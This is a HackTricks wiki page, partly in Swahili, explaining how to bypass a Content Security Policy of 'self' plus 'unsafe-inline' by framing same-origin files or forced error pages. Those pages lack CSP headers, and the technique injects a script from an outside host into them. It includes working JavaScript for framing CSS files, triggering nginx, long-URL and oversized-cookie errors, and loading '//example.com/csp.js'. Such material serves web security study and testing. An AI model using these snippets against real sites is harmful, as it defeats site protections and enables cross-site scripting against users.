CSP bypass: self + 'unsafe-inline' with Iframes

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Mkonfigu kama:

Content-Security-Policy: default-src 'self' 'unsafe-inline';

Prohibits usage of any functions that execute code transmitted as a string. For example: eval, setTimeout, setInterval will all be blocked because of the setting unsafe-eval

Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS

Via Text & Images

Inabainika kwamba vivinjari vya kisasa vinabadilisha picha na maandiko kuwa HTML ili kuboresha uonyeshaji wao (kwa mfano: kuweka mandharinyuma, kuzingatia, n.k.). Kwa hivyo, ikiwa picha au faili ya maandiko, kama favicon.ico au robots.txt, inafunguliwa kupitia iframe, inatolewa kama HTML. Kwa kuzingatia, kurasa hizi mara nyingi hazina vichwa vya CSP na zinaweza kutokuwepo na X-Frame-Options, na hivyo kuruhusu utekelezaji wa JavaScript isiyo na mpangilio kutoka kwao:

frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);

Via Errors

Vivyo hivyo, majibu ya makosa, kama vile faili za maandiko au picha, kwa kawaida yanakuja bila vichwa vya CSP na yanaweza kukosa X-Frame-Options. Makosa yanaweza kusababisha kupakia ndani ya iframe, kuruhusu hatua zifuatazo:

// Inducing an nginx error
frame=document.createElement("iframe");
frame.src="/%2e%2e%2f";
document.body.appendChild(frame);

// Triggering an error with a long URL
frame=document.createElement("iframe");
frame.src="/"+"A".repeat(20000);
document.body.appendChild(frame);

// Generating an error via extensive cookies
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
frame=document.createElement("iframe");
frame.src="/";
document.body.appendChild(frame);
// Removal of cookies is crucial post-execution
for(var i=0;i<5;i++){document.cookie=i+"="}

Baada ya kuanzisha mojawapo ya hali zilizotajwa, utekelezaji wa JavaScript ndani ya iframe unaweza kupatikana kama ifuatavyo:

script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);

References

https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousContent Security Policy (CSP) Bypass NextCookies Hacking

Last updated 7 days ago